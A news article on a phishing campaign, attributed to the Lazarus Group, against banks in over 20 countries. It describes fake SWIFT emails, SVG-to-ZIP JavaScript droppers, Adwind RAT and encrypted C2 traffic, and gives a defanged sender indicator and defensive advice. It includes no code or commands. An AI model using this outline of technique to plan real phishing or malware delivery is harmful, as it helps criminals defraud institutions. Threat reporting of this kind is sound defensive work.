Banks in Over 20 Countries, Including Nepal, Under Cyberattack ! Here’s How Malware Is Spreading

by

Are global banks facing a coordinated cyberattack? Nepali cybersecurity firm Bhairav Tech has revealed a sophisticated phishing campaign targeting financial institutions across Europe, Oceania, Africa, and Asia. Their recently published report uncovers alarming details about how cybercriminals are exploiting vulnerabilities to compromise financial systems worldwide.

What Does the Report Say About the Cyberattack?

According to Bhairav Tech’s Security Operations Center:

  • Targeted Institutions: Financial institutions in over 20 countries, including Nepal, are under attack.
  • Attack Methodology: Hackers are using malware-laden phishing emails to deceive users and steal sensitive data.
  • Suspected Culprit: The Lazarus Group, known for high-profile cybercrimes, is believed to be behind this attack.

How Are Hackers Exploiting Phishing Emails?

  1. Fake SWIFT Emails:
    • Attackers mimic the Society for Worldwide Interbank Financial Telecommunication (SWIFT), a trusted global financial messaging system.
    • Phishing emails appear legitimate, often thanking users for using SWIFT services and including fake payment details.
  2. Hidden Malware:
    • Emails contain malicious SVG files that download ZIP files with JavaScript.
    • Once executed, the malware infiltrates systems, steals credentials, and collects sensitive emails from Outlook.
  3. Sophisticated Malware Techniques:
    • Attackers use Adwind RAT, a cross-platform Remote Access Trojan, to extract personal data and monitor systems.
    • Malware communicates securely with Command and Control (C2) servers using XOR-encrypted URLs, evading detection.

Which Countries Are Affected?

The attack spans multiple continents, targeting banks in:

  • Europe: Italy, Austria, Hungary, Moldova, Serbia
  • Asia: Nepal, India, Pakistan, South Korea, Cambodia
  • Oceania: Papua New Guinea
  • Africa: Ethiopia, Nigeria
  • Middle East: UAE, Jordan, Saudi Arabia, Turkey, Azerbaijan

How Does the Malware Work?

  1. Phishing Initiation:
    • Emails originate from domains like “swiftmyi1@financeplus[.]me,” appearing authentic.
    • Once the SVG file is opened, it downloads malicious ZIP files.
  2. Execution of JavaScript Malware:
    • Files execute hidden scripts, creating fake receipts while infiltrating the device in the background.
    • Java Runtime Environment (JRE) is installed if missing, enabling the malware to function.
  3. Control and Data Theft:
    • Malware connects with C2 servers, downloads additional harmful scripts, and steals browser credentials and email data.

What Preventive Measures Are Recommended?

Bhairav Tech suggests:

  • Employee Training: Teach staff to identify phishing emails and avoid suspicious links.
  • Enhanced Security Tools: Use advanced phishing protection and behavior-based malware detection systems.
  • Monitoring Systems: Implement 24/7 network and system activity surveillance.
  • Access Restrictions: Limit the use of scripts and unauthorized apps on sensitive systems.
  • Incident Response Plans: Prepare for quick action against breaches.

Why Should This Concern You?

This cyberattack highlights the growing sophistication of cybercriminals and the vulnerabilities of even the most trusted systems. As hackers continue to exploit weaknesses, financial institutions and users must stay vigilant.

Are you or your organization prepared to combat these evolving cyber threats? Share your thoughts and experiences.

Leave a Comment